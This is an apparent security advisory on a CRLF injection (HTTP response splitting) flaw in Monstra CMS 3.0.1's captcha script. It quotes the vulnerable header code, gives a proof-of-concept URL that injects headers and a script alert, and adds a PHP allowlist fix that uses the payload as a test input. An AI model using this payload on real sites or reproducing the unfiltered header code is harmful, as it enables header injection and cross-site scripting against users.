Monstra 3.0.1 HTTP Response Splitting

2014.11.11
Credit: Paulos Yibelo
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Monstra <= 3.0.1 HTTP Response Splitting

File: /plugins/captcha/crypt/cryptographp.php

    SetCookie("cryptcookietest", "1");
    Header("Location: cryptographp.inc.php?cfg=".$_GET['cfg']."&sn=".session_name()."&".SID);

The cfg parameter is copied from $_GET into the Location header without any filtering, so providing

    http://localhost/mons/plugins/captcha/crypt/cryptographp.php?cfg=%0A%0DContent-Type:%20text/html%0A%0D%0A%0D%3Cscript%3Ealert%281%29%3C/script%3E&

would result in a CRLF injection.

Note: The PHP version must allow multiple headers. This is fixed in PHP > 5.1.2.
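
One way to close this hole, shown as an added example that is not Monstra's or cryptographp's own code: allowlist cfg before it reaches Header(), and refuse any header line that contains a control character. The allowlist pattern, the helper names safe_cfg() and build_location(), and the sample values are assumptions made for this illustration.

```php
<?php
// Added example, not Monstra or cryptographp code.
// Assumption: a legitimate cfg value is a short token of letters, digits, '_', '-' or '.'.

// Returns the validated cfg token, or null if the input must be rejected.
function safe_cfg($cfg)
{
    // cfg[]=x makes $_GET['cfg'] an array; only plain strings are acceptable.
    if (!is_string($cfg)) {
        return null;
    }
    // \A and \z anchor the whole string, so "abc\n" fails (a plain $ would accept it).
    return preg_match('/\A[A-Za-z0-9_.-]{1,64}\z/', $cfg) === 1 ? $cfg : null;
}

// Builds the complete header line; throws instead of emitting a header that could split.
function build_location($cfg, $sessionName, $sid)
{
    $line = 'Location: cryptographp.inc.php?cfg=' . rawurlencode($cfg)
          . '&sn=' . rawurlencode($sessionName);
    if ($sid !== '') {
        $line .= '&' . $sid; // SID is already "name=id", or empty when a cookie carries the session
    }
    // Defence in depth: no control character may appear anywhere in a header line.
    if (preg_match('/[\x00-\x1F\x7F]/', $line) === 1) {
        throw new InvalidArgumentException('control character in header value');
    }
    return $line;
}

// Constructed inputs: a benign value, the decoded payload from the advisory, an array.
$samples = [
    'default',
    "\n\rContent-Type: text/html\n\r\n\r<script>alert(1)</script>",
    ['x'],
];
foreach ($samples as $raw) {
    $cfg = safe_cfg($raw);
    if ($cfg === null) {
        echo "rejected: respond with 400, send no Location header\n";
        continue;
    }
    // In the real script this string would be passed to header().
    echo build_location($cfg, 'PHPSESSID', ''), "\n";
}
```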

